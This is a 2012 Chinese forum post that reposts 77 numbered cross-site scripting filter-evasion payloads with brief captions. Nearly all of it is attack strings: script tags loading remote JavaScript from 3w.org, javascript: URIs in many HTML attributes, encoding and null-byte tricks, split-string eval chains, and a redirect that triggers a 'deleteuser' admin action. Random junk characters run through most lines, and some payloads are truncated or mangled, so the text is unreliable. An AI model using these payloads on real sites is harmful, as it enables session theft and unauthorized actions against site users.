貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
9 f& O: z' ^7 a) O" B0 x2 L! ]6 l8 q& `1 i# P* Q! [& [9 u
(1)普通的XSS JavaScript注入9 l4 Y+ T1 G. G
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># v& s% R9 Z: S$ `+ Q( ?; U7 J
6 g2 _8 _: u0 F) k, j2 n (2)IMG标签XSS使用JavaScript命令, I8 z0 e4 H% p6 x) `% I# Q7 P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 Q7 q. B" F9 V9 D7 Y
; v" j1 A! s1 X5 K3 y3 ?' C (3)IMG标签无分号无引号
8 O& Z. [6 a* S2 l) `5 x" n! ~0 j <IMG SRC=javascript:alert(‘XSS’)>
9 W4 `6 N$ o+ a7 p7 A4 Y& C
' U8 _) _6 F- U" Z" @' B3 s5 R$ H' b (4)IMG标签大小写不敏感
* D" @- O. T* L( u8 M3 C$ ~ <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
% V$ J' D0 J; K( I# E' ]3 {9 ~9 N: U: D7 M# J8 y
(5)HTML编码(必须有分号)
/ I- d5 E7 m. V' P6 E9 _* U <IMG SRC=javascript:alert(“XSS”)>
- F2 n& X- p4 P- q: U6 ^+ ^' x2 S# e' N( L, u F4 z {
(6)修正缺陷IMG标签
3 U1 `2 ~4 S' c* p+ L2 ?0 t6 s <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>+ I* o, R* Z" y# t
7 ~( \9 v- z; j- v5 I
(7)formCharCode标签(计算器)
) R2 p8 [0 D; J; J6 q3 H <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>/ f% \5 g5 X, q' o. T" l% S
* M/ p; L# ?: Z& v* x (8)UTF-8的Unicode编码(计算器)
. G: s, b9 N4 ?( u <IMG SRC=jav..省略..S')>
4 B& M- r, H, K! B! e. u1 d: H& t) g. Z
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)6 q: E9 s$ C6 B- {4 h: _8 o
<IMG SRC=jav..省略..S')>$ K8 c% c# N- L# y! B( E$ u
3 R4 _- f1 @( T+ ~ }% D
(10)十六进制编码也是没有分号(计算器)& ^: \& b q& s4 j5 ]& Y
<IMG SRC=java..省略..XSS')>! s; P- Q$ x* h* j
) J! v3 b$ F C* Z# v( X, A (11)嵌入式标签,将Javascript分开
' a5 {! z) l0 l% ?' H% } <IMG SRC=”jav ascript:alert(‘XSS’);”>
6 ~# O0 p+ f: }6 o O3 V- {( C4 Y; w" F, `
(12)嵌入式编码标签,将Javascript分开) N! }! R5 B( h9 q, c4 x1 H
<IMG SRC=”jav ascript:alert(‘XSS’);”>! @, r: U. I" ~$ w6 ?! _. [6 R
' d2 D9 y' L0 W! }2 ?5 V# ^ (13)嵌入式换行符% N% n2 L- u+ u$ l( ~" V# F& Z, H
<IMG SRC=”jav ascript:alert(‘XSS’);”>% T4 X2 u1 ~ |
2 h( K0 | t5 O
(14)嵌入式回车
/ \# ~& v& @0 ^+ P <IMG SRC=”jav ascript:alert(‘XSS’);”>+ w; s0 o' h/ V, h- r+ ^
' i8 J( h5 [! I* h (15)嵌入式多行注入JavaScript,这是XSS极端的例子
: e7 V4 ], B: J- j6 A <IMG SRC=”javascript:alert(‘XSS‘)”>
# A" v, D0 |9 y M- S, p( e( D# R. ]( t- i5 |6 Q( N
(16)解决限制字符(要求同页面)8 E; h# y$ w4 C
<script>z=’document.’</script># I! y# K# _7 A% S( C( G, P
<script>z=z+’write(“‘</script>
' N. g% W+ k% M/ C- g <script>z=z+’<script’</script>
/ P% n" [* v* |$ i$ P% A% O+ U <script>z=z+’ src=ht’</script>0 G; {4 X: Q _3 f
<script>z=z+’tp://ww’</script>
+ w2 F) E4 Y; W* I6 ~ <script>z=z+’w.shell’</script>
; M' b: `: Z& p" S% W n <script>z=z+’.net/1.’</script>5 s+ l8 o( `( A t( V! c2 Q
<script>z=z+’js></sc’</script>
8 ~& c* @: B0 F <script>z=z+’ript>”)’</script>( { \+ \) w( B1 H) x
<script>eval_r(z)</script>
8 F; R' n& t0 M6 P* M% D1 S! e$ l# Q$ r# y- z) c( A/ u
(17)空字符
4 N; J! E o8 [7 q perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 L6 B: q/ {( |6 c) M; x$ T
: q" z! t6 n3 g
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用4 b# V4 f. ^; z0 Y) X6 ^8 v
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out$ A- e- d1 W& p( H, z
1 f' Y3 f/ a" H
(19)Spaces和meta前的IMG标签
; V Z$ x# i% C1 F <IMG SRC=” � javascript:alert(‘XSS’);”>
4 i% T& Z% _; l- g, p) U6 e5 K! P/ u5 h q% g9 j' o
(20)Non-alpha-non-digit XSS# }0 u7 [7 r5 ?+ h1 i. ~
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) e+ J0 G& j, [5 T' T0 e' H: \. t- n0 |- Q* S
(21)Non-alpha-non-digit XSS to 2; U+ e3 w# D% y
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) f* h) n( K+ b; M4 y, l0 A3 b. G" G7 h" o5 e1 i; k6 }4 P5 P
(22)Non-alpha-non-digit XSS to 3
8 W% e% v4 L' K# m! t' ^ <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>5 M3 n8 W/ U: s
. s$ y; f( ^' f (23)双开括号
3 c$ {# H8 K4 \9 C: G" o( B' s4 O <<SCRIPT>alert(“XSS”);//<</SCRIPT>3 b, x6 H( E8 B% `& e$ b
. f# g9 a" c; s
(24)无结束脚本标记(仅火狐等浏览器)2 C3 _; o1 ^' T4 k
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
, T2 d y, ]) m: h' D- x, B; ~3 t7 a9 }. O
(25)无结束脚本标记2
j7 t0 T6 B# a- b$ u p# U" }4 a <SCRIPT SRC=//3w.org/XSS/xss.js>& H0 j7 b% I V+ t, u
- q1 Y$ N, u4 }6 }9 S/ Y (26)半开的HTML/JavaScript XSS
8 @1 {% _4 A/ M+ S! [7 g <IMG SRC=”javascript:alert(‘XSS’)”
) k" P5 q3 N, }) A" p6 |# D
5 X) }* e& i1 l6 {8 w X* \ (27)双开角括号; ~6 w. n- O# d. {- e8 a* Q7 _
<iframe src=http://3w.org/XSS.html </ m3 O# V, N- h8 Z3 ]
" _' q+ Z* w, e$ t$ P& e (28)无单引号 双引号 分号" F7 c6 y8 C& D+ A( D Q5 N( Z3 J
<SCRIPT>a=/XSS/: P* r4 A" R6 }" y" C
alert(a.source)</SCRIPT>
9 J7 @ l; V8 a7 Q! d
5 S3 Y- N% w0 @/ e u/ d (29)换码过滤的JavaScript; b* h" g4 q8 K
\”;alert(‘XSS’);//
) O4 E1 O3 V4 e9 J( u/ H1 {! ~6 N0 f u) T( O D5 X8 k, c
(30)结束Title标签5 f* H2 L+ b! r- @9 ?- m
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>1 `8 P/ [' F2 o& X8 ^& _
/ j+ j* q7 H9 R4 M! e6 Q (31)Input Image
( g) V3 n& y3 R9 N) ], I- U% L; h) X <INPUT SRC=”javascript:alert(‘XSS’);”>
( w* Z4 r0 U9 I" J* \* |, M
3 h. |/ V1 A+ F- l (32)BODY Image U6 O% ^' Q% F& K) U
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>$ a. N7 t& ^/ F: @/ p
0 ]; ~: u- t C4 L" S0 b% F) | (33)BODY标签7 t. W- \9 O2 I8 q2 \. L
<BODY(‘XSS’)>' c2 v- e( q+ P. h
, a5 w+ \! C: x9 O/ z
(34)IMG Dynsrc
' R- ^- Y' @- v1 R; V" ` <IMG DYNSRC=”javascript:alert(‘XSS’)”>2 r/ l. P, B9 w8 D6 v9 @
' d9 C2 |' S5 v6 w6 F0 J% G7 v1 D
(35)IMG Lowsrc
) E2 e5 [, P( G3 W, S: B" {+ y <IMG LOWSRC=”javascript:alert(‘XSS’)”> T8 u+ G6 r/ g
! R: s: e" O2 F- j7 T (36)BGSOUND3 `. T) W. x' N1 P
<BGSOUND SRC=”javascript:alert(‘XSS’);”>+ B7 z7 D V: G& R
" C! ?3 o4 ^5 ] g8 F
(37)STYLE sheet2 J4 i9 N$ A; I* f
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- Y( `" i6 U: Z. M2 u7 P8 R0 A1 l
# g6 @8 E' S9 K (38)远程样式表% ` g0 d5 h0 R3 H
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 D: T- k/ h4 B& [2 o% B
# I' V- p- `; \& X) H (39)List-style-image(列表式)4 H& ?1 u. m' P
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
3 n# Z$ V5 n. S* ^6 |
% J! N, {6 ]5 o. M (40)IMG VBscript- l S4 B: F9 b5 w. Y' @% U& ^
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS3 T3 \5 d- z& d# @! I/ z
& I8 [, ?9 S9 N- P# ^ (41)META链接url
+ ]0 ^4 K0 `' j: C0 K4 A: W1 ? <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>& m1 @' M/ P4 O- M3 n A P; L
: F; x( [1 g' E9 O# f
(42)Iframe
9 h& F# A1 U, F T# Q6 K) | <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" K$ r- N' z8 ~
# R3 @ v9 W, J9 Z" Z2 H% w (43)Frame, j x! M+ X. ?: C. Z5 M3 b! f8 \
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
2 |1 {- g. ]8 r* N: r" ?8 \* X, {; q$ E
(44)Table9 l) T& t! ]- F8 Q2 ^
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>. e/ l* u& Z7 a. L, U% b
! F3 s9 V2 M5 o" X/ i (45)TD
& K# n& y5 s$ |0 Y) L. P4 B <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 k. s0 H2 {- ]" e. F3 L
% _6 l" M" N! v' @ (46)DIV background-image: G: h% ^5 D$ b% u+ z% |
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>( Z, G( q0 r3 F3 A' Q
) L- [7 R* C9 {9 E) k0 k7 f% [9 s
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)& o1 ~7 p) I* ~( S. ?9 ]
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
; U7 e/ J0 A1 H1 ?! \! i' S
+ ?( _( t, ^ ], w (48)DIV expression& B( l, V; q5 w
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ a4 J6 P# U4 V! n1 p( p5 f' F, v) u$ K: l& x5 a4 C
(49)STYLE属性分拆表达, G+ ^$ |( C y2 V2 n& }; Q3 Z! Q
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
8 x$ R6 W. r8 q; X6 y) f& I+ l% R0 t/ f9 T& B
(50)匿名STYLE(组成:开角号和一个字母开头)
7 x) n0 T& a8 t+ @ <XSS STYLE=”xss:expression_r(alert(‘XSS’))”># K% g, A& f; t! Y p
+ j3 h8 v% q0 h, g2 I. v
(51)STYLE background-image1 v5 l4 ]5 A# Z# g
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
" f$ T3 f2 ?$ s _1 o8 n2 R
% k* f1 n! p/ q3 w+ B" ?6 H (52)IMG STYLE方式2 }: B ?, s/ ?8 b+ ?
exppression(alert(“XSS”))’>
( O8 ]( P6 p: Z6 ]6 Y+ k$ s [" F2 m+ ?3 p2 }) D( [
(53)STYLE background& e+ ]% |, Y( m, o
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
- Y# ?' ~5 I: i- J; X, T9 `7 t# V6 K* p. b$ @' O: j) I
(54)BASE" i% Q9 I" |5 b* U5 H) I
<BASE HREF=”javascript:alert(‘XSS’);//”>
" j5 |. E6 J( ? w0 Q; |# S9 U8 a" T% g F
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS% l v) M6 U' j9 X
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
' [4 h/ J% M1 }8 J2 b' Z6 P- `9 Q: i$ j! B0 e
(56)在flash中使用ActionScrpt可以混进你XSS的代码
* b* j; r$ Z1 U+ ?( T6 k5 x a=”get”;% h) i' l$ [8 S$ W
b=”URL(\”";
7 x" } e7 X' ] c=”javascript:”;
5 p/ ~2 I( X- i+ J/ f2 S3 J9 U d=”alert(‘XSS’);\”)”;; v7 b9 ]" X6 g
eval_r(a+b+c+d);! o" \/ H9 d" T
" i5 S6 U9 J' R1 R) n
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
/ f, I+ _ c9 F& h0 Z <HTML xmlns:xss>
8 ]8 @' }1 J1 |3 G( P$ R, Z <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>4 p4 X2 f( H/ ] C
<xss:xss>XSS</xss:xss>6 h2 p2 ]3 O4 j3 I
</HTML>" C" ~4 |, G& @* }7 L/ g, ]1 Q: B$ f! i
$ k' {1 f% K! }' E5 w (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
% z3 o1 d! I r7 n" [7 _ <SCRIPT SRC=””></SCRIPT>0 n ~0 F8 r7 K3 Z, B/ u* ?4 P
3 m3 V$ U! `+ `
(59)IMG嵌入式命令,可执行任意命令1 U% o3 C% T4 A4 r( U- X
<IMG SRC=”http://www.XXX.com/a.php?a=b”>, e1 @) C5 [2 O" u
7 g4 I- X, G) R1 X9 r (60)IMG嵌入式命令(a.jpg在同服务器)
: R, Y( e! O5 M) b Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
9 [ `% b4 F# D1 R
, P/ s9 ]/ o V. s (61)绕符号过滤
$ i ~" R! E( o2 U3 y <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>& a! `3 u; D4 E" w# B9 W
9 v6 R% X8 s' y7 P( b (62)6 y$ ]* v& r& |7 q6 `: Q; c
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! ~# U2 x, l; ^! ]$ x$ U3 p
' q. ~7 H7 `4 K* g; m$ D (63)6 F, N7 e# h" M- q4 P
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
. s2 P4 r8 X z7 O( S) }" F5 P' y* f8 Q* u6 q/ B
(64)
8 ~0 _2 D2 r& z% S( O; u& G$ Z$ e <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT> Y H U$ |+ N6 W: p( k) S
$ [; a- N$ |8 V- \5 d (65)
5 Y3 d6 X, ]; q$ w( M) Q1 M <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>8 G; S/ b- i* h1 X) E3 E* H
; Q3 E4 `$ b$ k e, L# y3 b* B1 q* k
(66)" `( V. n5 {' K+ c; Q( s# w& Q) _
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>1 X# j6 I* D. F2 D, v
: G7 D9 t% S- r' } (67)
( S# ~% w0 G) h/ S3 k% Y9 v, z <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>+ L; @8 J3 A: ?4 P# _1 y, k# l
A: y+ |8 i% @
(68)URL绕行/ q! _! G# V5 N3 `, q9 T% R
<A HREF=”http://127.0.0.1/”>XSS</A>7 g+ t' G% ]8 [9 g
3 p. ~ L: g2 ?5 T% x
(69)URL编码
+ W# B! {0 E Y+ S6 [! U <A HREF=”http://3w.org”>XSS</A>
- L* C1 N: D1 G/ E$ T) z2 x
' H6 Q* s- T" z& |, Z (70)IP十进制
; ], l1 v/ X0 z, }$ \$ Z% Z+ @" _ <A HREF=”http://3232235521″>XSS</A>
- m2 p7 G4 u7 E# L# j! g9 V$ l
, N2 P* P- D, q' g) }# g0 L2 G* v) I4 k (71)IP十六进制, i7 Y6 v6 j3 L) j U" t8 n
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>2 D1 {: p k* {' ]
7 I1 n& m1 \' A# `
(72)IP八进制7 y S3 m5 \2 A$ }2 e
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
' K; M7 s' @1 m1 N! Z/ ?
8 i8 h& x1 w! y# X4 D (73)混合编码+ A. i. j% C/ L8 _% q( N0 G
<A HREF=”h
$ i! [4 D+ Y- r1 I9 O% Y4 L# X tt p://6 6.000146.0×7.147/”">XSS</A>' S4 B5 h9 @) j$ e% g' ?& {5 p
7 {3 q4 q: Z! @7 P! X" \ (74)节省[http:]" D$ Z) y* g2 L q* ^- S" [. }
<A HREF=”//www.google.com/”>XSS</A>( F' o+ _0 o. v- J/ x2 E8 o
, B; R) [ O9 k4 y; {
(75)节省[www]
l z% {! a2 [0 o7 C! s/ I' l. V <A HREF=”http://google.com/”>XSS</A>
1 ^! Y Q, {7 E0 ]$ O g
4 a5 H: f* d6 s, O8 Q; | (76)绝对点绝对DNS
2 V! z/ r4 z7 d <A HREF=”http://www.google.com./”>XSS</A>, ~8 `- i6 P$ f+ t& _# t
# n2 i$ ^) l* _6 l G' x
(77)javascript链接
v& i. r* J* V6 o( _! q& h <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对